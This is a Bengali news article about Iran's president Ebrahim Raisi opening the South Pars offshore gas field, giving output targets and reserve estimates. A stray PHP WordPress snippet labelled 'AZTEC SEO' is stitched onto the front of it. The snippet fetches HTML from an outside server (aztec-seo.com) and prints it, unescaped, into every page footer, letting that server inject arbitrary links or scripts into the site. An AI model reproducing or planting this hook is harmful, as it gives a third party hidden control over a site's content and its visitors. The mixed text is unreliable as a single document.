/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
পারস্য উপসাগরে পৃথিবীর বৃহত্তম অফশোর গ্যাস ফিল্ডের উদ্বোধন করেছেন ইরানের প্রেসিডেন্ট ইব্রাহিম রাইসি। গতকাল সোমবার (২৮ আগস্ট) সাউথ পারস গ্যাস ফিল্ডের কার্যক্রম শুরু হয়। খবর আনাদোলু এজেন্সি।
যুক্তরাষ্ট্রের নিষেধাজ্ঞার কারণে ২০১৮ সালে এই প্রজেক্ট থেকে সরে যায় ফ্রান্সের প্রতিষ্ঠান টোটাল।
দক্ষিণ-পশ্চিমাঞ্চলীয় বুশেহর প্রদেশের আসালুয়েহ বন্দরে উদ্বোধনী অনুষ্ঠানেরআয়োজন করা হয়। দীর্ঘ বিলম্ব এ প্রকল্পকে প্রেসিডেন্ট রাইসি ‘জটিল ও অনন্য’ বলে অভিহিত করেন।
সঙ্গে জানান, এই অফশোর গ্যাস ক্ষেত্র ইরানকে তার প্রয়োজনীয় সরবরাহ নিশ্চিতের পাশাপাশি পারস্য উপসাগর অঞ্চলের প্রতিবেশীদের হিস্যা নিশ্চিত করবে।
ইরানের জ্বালানি তেল মন্ত্রণালয় গতকাল জানিয়েছে, সাউথ পারস গ্যাস ফিল্ড প্রাথমিকভাবে প্রতিদিন এক কোটি ৫০ লাখ ঘনমিটার গ্যাস উৎপাদন করবে এবং পরবর্তী সময়ে তা প্রতিদিন পাঁচ কোটি ৬০ লাখ ঘনমিটার গ্যাস, ৫০ হাজার ব্যারেল কনডেনসেট গ্যাস ও ৭৫০ টন সালফারে উন্নীত হবে।
পার্স গ্যাস ক্ষেত্রটি ১৯৯০ সালে ইরানের জাতীয় জ্বালানি তেল কোম্পানি (এনআইওসি) আবিষ্কার করে। এতে ১৪ ট্রিলিয়ন ঘনমিটার গ্যাস ও ১৮ বিলিয়ন ব্যারেল তরলীকৃত প্রাকৃতিক গ্যাস মজুদ রয়েছে বলে অনুমান করা হয়।